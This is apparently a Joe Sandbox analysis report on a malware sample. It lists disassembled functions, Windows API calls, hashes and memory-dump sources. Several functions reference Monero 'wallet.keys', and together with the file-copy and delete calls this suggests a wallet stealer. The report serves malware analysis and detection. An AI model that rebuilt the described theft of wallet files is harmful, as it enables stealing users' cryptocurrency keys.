                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                         • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: 888b5e8c62908a934cf7702f5e50a89b346df4ad018c66decf6128361c15d881
                        • Instruction ID: f5f4e71bb9948d4aa46a86b8760c730ce8514f55ab1d38a52aa14bb67302b541
                        • Opcode Fuzzy Hash: 888b5e8c62908a934cf7702f5e50a89b346df4ad018c66decf6128361c15d881
                        • Instruction Fuzzy Hash: BC21FAB5D00208ABCF04EFE8D955AEEB7B9FF48300F04852EE416E3250EB355604CBA9
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009A7E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A7E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,015ABA10,00000000,00020119,?), ref: 009A7E5E
                        • RegQueryValueExA.ADVAPI32(?,015BD238,00000000,00000000,000000FF,000000FF), ref: 009A7E7F
                        • RegCloseKey.ADVAPI32(?), ref: 009A7E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                         • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: e97ead5e7b8e5c5f946044054e6248dc391366d725a46a261b17437c2feb0e94
                        • Instruction ID: 0731d00b12998d42cc7ac864f171ca59f9a48c1b7274ed78383d030b823ca91f
                        • Opcode Fuzzy Hash: e97ead5e7b8e5c5f946044054e6248dc391366d725a46a261b17437c2feb0e94
                        • Instruction Fuzzy Hash: 0F119EB1A44205EBD700CFD4DD5AFBBFBB8EB44B10F20415AFA05A7290EB7959008BE1
                        APIs
                        • StrStrA.SHLWAPI(015BDA70,?,?,?,009A140C,?,015BDA70,00000000), ref: 009A926C
                        • lstrcpyn.KERNEL32(00BDAB88,015BDA70,015BDA70,?,009A140C,?,015BDA70), ref: 009A9290
                        • lstrlen.KERNEL32(?,?,009A140C,?,015BDA70), ref: 009A92A7
                        • wsprintfA.USER32 ref: 009A92C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                         • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s
                        • API String ID: 1206339513-3252725368
                        • Opcode ID: 1d0ae940b670e18cbd874cab7d57b8d97b0e8d821b60d80579ea839d297a3100
                        • Instruction ID: 69055de4f63ef8f9b09e7e1e44a72756588fb26d33f44ca7238a5826efd1908e
                        • Opcode Fuzzy Hash: 1d0ae940b670e18cbd874cab7d57b8d97b0e8d821b60d80579ea839d297a3100
                        • Instruction Fuzzy Hash: AD01C875501108FFCB08DFECC998EAEBBB9EB48354F108589F9099B344DA31AA41DB91
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009912B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009912BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009912D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009912F5
                        • RegCloseKey.ADVAPI32(?), ref: 009912FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                         • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: fa6782c575f5238bf1376d88c55e2d814a4a34104d962df83e8652f4fc527c69
                        • Instruction ID: 439fc048513b3b26836ac52abdf9decd8f585b92f9b06de7cb00cbab4b75c837
                        • Opcode Fuzzy Hash: fa6782c575f5238bf1376d88c55e2d814a4a34104d962df83e8652f4fc527c69
                        • Instruction Fuzzy Hash: F901E1B9A40208BBDB04DFE4DC59FAEB7BCEB48701F10815AFE1597280EA759A019F51
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 009A6663
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 009A6726
                        • ExitProcess.KERNEL32 ref: 009A6755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                         • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: 8cc221d64327165576eab00f06b1b9abf9a0d710b9b20de8621e1f3b35413daf
                        • Instruction ID: 8f6824d6c116df24a779cd906b997aa28837a6cbb4b4e12ed0a831a5fc00f654
                        • Opcode Fuzzy Hash: 8cc221d64327165576eab00f06b1b9abf9a0d710b9b20de8621e1f3b35413daf
                        • Instruction Fuzzy Hash: D93130B1D01218ABDB54EB90DC95FDEB778AF84300F404189F20967191EF746B48CF9A
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,009B0E28,00000000,?), ref: 009A882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A8836
                        • wsprintfA.USER32 ref: 009A8850
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                         • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: dccfbc6c081a6e405db5f708d84ce0ee5f2e0e5ec7887f3683e8f580f2d250fa
                        • Instruction ID: 539e389eec8d749fbf74a3a21f2bbbf703ff0c152f4fa4a029167adce2a33e43
                        • Opcode Fuzzy Hash: dccfbc6c081a6e405db5f708d84ce0ee5f2e0e5ec7887f3683e8f580f2d250fa
                        • Instruction Fuzzy Hash: 822142B1A41204EFDB04DF94DD55FAEFBB8FB48711F104119FA05A7280DB79A901CBA1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,009A951E,00000000), ref: 009A8D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A8D62
                        • wsprintfW.USER32 ref: 009A8D78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                         • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: f9b48ded75c57233c0b45fbdd6a481b69fd735fa12c59ed8332dae143e100bd2
                        • Instruction ID: fada64993a8549b96086e316fe445040b8fc5525de7f1330759a122f3e496b69
                        • Opcode Fuzzy Hash: f9b48ded75c57233c0b45fbdd6a481b69fd735fa12c59ed8332dae143e100bd2
                        • Instruction Fuzzy Hash: 72E0ECB5A41208BBD710DF94DD1AE69BBB8EB84702F004195FD0997290EE729E109B96
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009A8B60: GetSystemTime.KERNEL32(009B0E1A,015B9A38,009B05AE,?,?,009913F9,?,0000001A,009B0E1A,00000000,?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009A8B86
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0099A2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 0099A3FF
                        • lstrlen.KERNEL32(00000000), ref: 0099A6BC
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 0099A743
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                         • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: f10ae5c48406392c331b45eb34bf04710f0de57d71b7fb25b13cfa3e143d2892
                        • Instruction ID: 2c0a95181929becb6c8a7ee32f924febb62a1d084f8cc07fd9239264d31401bc
                        • Opcode Fuzzy Hash: f10ae5c48406392c331b45eb34bf04710f0de57d71b7fb25b13cfa3e143d2892
                        • Instruction Fuzzy Hash: 64E1EF728101089BDB49FBA8DC96FEEB33CAF95300F508159F51772091EF346A49CBA6
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009A8B60: GetSystemTime.KERNEL32(009B0E1A,015B9A38,009B05AE,?,?,009913F9,?,0000001A,009B0E1A,00000000,?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009A8B86
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0099D481
                        • lstrlen.KERNEL32(00000000), ref: 0099D698
                        • lstrlen.KERNEL32(00000000), ref: 0099D6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 0099D72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                         • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 596ad688391008576ffb4d023b3f5211fe83d9fc3c821118e44f3c184ef29571
                        • Instruction ID: 57c11160c2c4845e69a412ca6a7a115a834cc6b39772dfae83e318716e880af7
                        • Opcode Fuzzy Hash: 596ad688391008576ffb4d023b3f5211fe83d9fc3c821118e44f3c184ef29571
                        • Instruction Fuzzy Hash: 3C9112729101089BDB44FBA4DDA6FEEB339AF95300F504169F507A7091EF346A09CBE6
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009A8B60: GetSystemTime.KERNEL32(009B0E1A,015B9A38,009B05AE,?,?,009913F9,?,0000001A,009B0E1A,00000000,?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009A8B86
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0099D801
                        • lstrlen.KERNEL32(00000000), ref: 0099D99F
                        • lstrlen.KERNEL32(00000000), ref: 0099D9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 0099DA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                         • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 420828950780e151af4b51056b574ed03b157de15d371e8e08d6a0a5c4f2a4f6
                        • Instruction ID: 1b1f0c9bd41868c2c0d3ccd59c4b958cb96604ed756f7fff8c0ee2e9bc76fcb1
                        • Opcode Fuzzy Hash: 420828950780e151af4b51056b574ed03b157de15d371e8e08d6a0a5c4f2a4f6
                        • Instruction Fuzzy Hash: E681E2729101089BDB44FBA4DDA6FEEB339AF95300F504519F507A70A1EF346A09CBE6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                         • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
